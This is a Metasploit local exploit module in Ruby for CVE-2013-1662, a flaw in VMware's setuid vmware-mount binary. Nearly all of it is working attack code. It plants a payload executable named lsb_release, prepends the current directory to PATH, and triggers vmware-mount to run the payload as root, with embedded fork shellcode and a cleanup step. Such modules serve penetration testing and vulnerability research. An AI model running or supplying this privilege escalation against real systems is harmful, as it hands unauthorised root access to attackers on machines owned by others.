VMWare Setuid vmware-mount Unsafe popen(3)

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
require 'rex'  
require 'msf/core/post/common'  
require 'msf/core/post/file'  
  
class Metasploit4 < Msf::Exploit::Local  
  
include Msf::Exploit::EXE  
include Msf::Post::Common  
include Msf::Post::File  
  
def initialize(info={})  
super( update_info( info, {  
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',  
'Description' => %q{  
VMWare Workstation (up to and including 9.0.2 build-1031769)  
and Player have a setuid executable called vmware-mount that  
invokes lsb_release in the PATH with popen(3). Since PATH is  
user-controlled, and the default system shell on  
Debian-derived distributions does not drop privs, we can put  
an arbitrary payload in an executable called lsb_release and  
have vmware-mount happily execute it as root for us.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Tavis Ormandy', # Vulnerability discovery and PoC  
'egypt' # Metasploit module  
],  
'Platform' => [ 'linux' ],  
'Arch' => ARCH_X86,  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DefaultOptions' => {  
"PrependSetresuid" => true,  
"PrependSetresgid" => true,  
},  
'Privileged' => true,  
'DefaultTarget' => 0,  
'References' => [  
[ 'CVE', '2013-1662' ],  
[ 'OSVDB', '96588' ],  
[ 'BID', '61966'],  
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],  
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]  
],  
'DisclosureDate' => "Aug 22 2013"  
}  
))  
# Handled by ghetto hardcoding below.  
deregister_options("PrependFork")  
end  
  
def check  
if setuid?("/usr/bin/vmware-mount")  
CheckCode::Vulnerable  
else  
CheckCode::Safe  
end  
end  
  
def exploit  
unless check == CheckCode::Vulnerable  
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")  
end  
  
# Ghetto PrependFork action which is apparently only implemented for  
# Meterpreter.  
# XXX Put this in a mixin somewhere  
# if(fork()) exit(0);  
# 6A02 push byte +0x2  
# 58 pop eax  
# CD80 int 0x80 ; fork  
# 85C0 test eax,eax  
# 7406 jz 0xf  
# 31C0 xor eax,eax  
# B001 mov al,0x1  
# CD80 int 0x80 ; exit  
exe = generate_payload_exe(  
:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded  
)  
write_file("lsb_release", exe)  
  
cmd_exec("chmod +x lsb_release")  
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")  
# Delete it here instead of using FileDropper because the original  
# session can clean it up  
cmd_exec("rm -f lsb_release")  
end  
  
def setuid?(remote_file)  
!!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")  
end  
  
end  
  
`